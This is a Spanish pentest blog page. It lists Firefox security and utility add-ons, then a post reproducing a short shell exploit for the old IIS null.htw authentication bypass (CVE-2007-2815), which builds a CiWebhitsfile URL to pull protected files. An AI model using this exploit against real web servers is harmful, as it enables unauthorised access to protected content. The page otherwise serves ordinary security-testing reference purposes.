Pared Sur: Pentest

Mostrando entradas con la etiqueta Pentest. Mostrar todas las entradas

Mostrando entradas con la etiqueta Pentest. Mostrar todas las entradas

Mis Addons Preferidos de Firefox

-

Mauro

Comparto con Uds. los addons que más utilizo en Firefox. Las descripciones las tienen dentro de cada link, así como la opción de descarga.

Addons de Seguridad iT y Pentest

Passive REcon
https://addons.mozilla.org/mn/firefox/addon/passiverecon/

FoxyProxy
http://support.microsoft.com/kb/2505743

Https Everywhere
https://www.eff.org/https-everywhere

SQL Inject Me
https://addons.mozilla.org/en-us/firefox/addon/sql-inject-me/

Access Me
https://addons.mozilla.org/mn/firefox/addon/access-me/

Xss Me
https://addons.mozilla.org/en-us/firefox/addon/xss-me/

Add N Edit Cookies
https://addons.mozilla.org/en-us/firefox/addon/add-n-edit-cookies-13793/

Add & Edit Cookies +
https://addons.mozilla.org/en-us/firefox/addon/add-n-edit-cookies-92079/

Live Http Headers
https://addons.mozilla.org/en-us/firefox/addon/live-http-headers/

Network toosl (Router Status)
http://www.brothersoft.com/router-status-216375.html

Wot
https://addons.mozilla.org/es-ES/firefox/addon/wot-safe-browsing-tool/

Active Whois
https://addons.mozilla.org/es-ES/firefox/addon/active-whois-plugin-for-firefo/

WebDeveloper
https://addons.mozilla.org/es-ES/firefox/addon/web-developer/

User Agent Switcher
https://addons.mozilla.org/mn/firefox/addon/user-agent-switcher/

HackBar
https://addons.mozilla.org/mn/firefox/addon/hackbar/

FireCookie
https://addons.mozilla.org/mn/firefox/addon/firecookie

Tamper Data
https://addons.mozilla.org/mn/firefox/addon/tamper-data/

TorButton
https://addons.mozilla.org/mn/firefox/addon/torbutton

NoScript
https://addons.mozilla.org/en-us/firefox/addon/noscript/

Utilitarios Varios - (No de seguridad)

Adblock Plus
https://addons.mozilla.org/es-ES/firefox/addon/adblock-plus/

CoolPreviews
https://addons.mozilla.org/es-ES/firefox/addon/coolpreviews/

TooManyTabs
https://addons.mozilla.org/en-us/firefox/addon/toomanytabs-saves-your-memory/

Picnik
https://addons.mozilla.org/es-ES/firefox/addon/picnik/

Pixlr Grabber
https://addons.mozilla.org/es-ES/firefox/addon/pixlr-grabber/

Image Zoom
https://addons.mozilla.org/es-ES/firefox/addon/image-zoom/

Flash Got
https://addons.mozilla.org/es-ES/firefox/addon/flashgot/

DownThemAll
https://addons.mozilla.org/es-ES/firefox/addon/downthemall/

Download Status Bar
https://addons.mozilla.org/es-ES/firefox/addon/download-statusbar/

ColorZilla
https://addons.mozilla.org/es-ES/firefox/addon/colorzilla/

Febe (Backup Firefox extensions)
https://addons.mozilla.org/mn/firefox/addon/febe/

Reminder Fox
https://addons.mozilla.org/mn/firefox/addon/reminderfox

Capture Fox
https://addons.mozilla.org/mn/firefox/addon/capture-fox/

-

Mauro

Haciendo pentest sobre un Webserver di con un viejo problema el cual desconocía, con lo cual procedo a dejarme documentado en este post la info para explotar el problema.

Microsoft IIS ntlm and basic auth bypass
You can protect your web contents by adding ntfs acls, then you will be secure.
But you can protect your web contents by the Internet Information basic/ntlm autentication, then this will be bypassed with null.htw object.

Both authentications seem be the same, but really the object null.htw let users get any file in web directory, only if it is protected by the filesystem, will be secure.

In the exploit you can see how to use the null.htw object.

Código:

#!/bin/sh
#
# NTLM && BASIC AUTH BYPASS :)
#
# sha0[at]badchecksum.net
# Based on my adv: http://www.securityfocus.com/bid/24105/info
# (CVE-2007-2815)

if [ $# != 2 ]
then
printf "USAGE:\t\t$0 \nExample:\t$0 http://www.microsoft.com /en/us/default.aspx\n\n";
exit 0
fi

site=$1
protectedObject=$2
variabledatos=$site'/shao/null.htw?CiWebhitsfile='$protectedObject'&
CiRestriction=b&CiHiliteType=full'
lynx -dump $variabledatos

Fuente; badchecksum.net